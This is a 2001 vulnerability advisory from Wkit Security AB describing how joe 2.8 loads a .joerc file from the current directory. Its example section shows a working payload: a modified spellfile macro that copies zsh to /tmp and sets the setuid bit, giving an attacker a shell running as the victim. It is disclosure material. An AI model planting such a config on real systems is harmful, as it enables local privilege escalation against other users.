WKIT SECURITY AB www.wkit.com TITLE: Joe's Own Editor File Handling Error ADVISORY ID: WSIR-01/02-02 REFERENCE: http://www.wkit.com/advisories CVE: GENERIC-MAP-NOMATCH CREDIT: Christer Öberg, Wkit Security AB CONTACT: [EMAIL PROTECTED] CLASS: File Handling Error OBJECT: joe(1) (exec) VENDOR: Josef H. Allen STATUS: REMOTE: No LOCAL: Yes VULNERABLE: Joseph Allen joe 2.8 DATE CREATED: 26/02/2001 LAST UPDATED: VENDOR CONTACT: RELEASE: 28/02/2001 VULNERABILITY DESCRIPTION joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and /usr/local/lib/joerc in that order. Users could be tricked into execute commands if they open/edit a file with joe in a directory where other users can write. CONDITIONS User using joe in a world/group writable directory. EXAMPLE A user copy the default joerc file to a world writable directory and change :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype to :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype Another user opens a file in that directory with joe and run ispell with ^[l the result is a suid shell in /tmp SOLUTION/VENDOR INFORMATION/WORKAROUND DISCLAIMER The contents of this advisory may be distributed freely, provided that no fee is charged and proper credit is given. Wkit Security AB takes no credit for this discovery if someone else has published this information in the public domain before this advisory was released. The information herein is intended for educational purposes, not for malicious use. Wkit Security AB takes no responsibility whatsoever for the use of this information. ABOUT Wkit Security AB is an independent data security company working with security-related services and products. Wkit Security AB Upperudsv. 4 S-464 72 Håverud SWEDEN http://www.wkit.com e-mail: [EMAIL PROTECTED] (C) 2001 WKIT SECURITY AB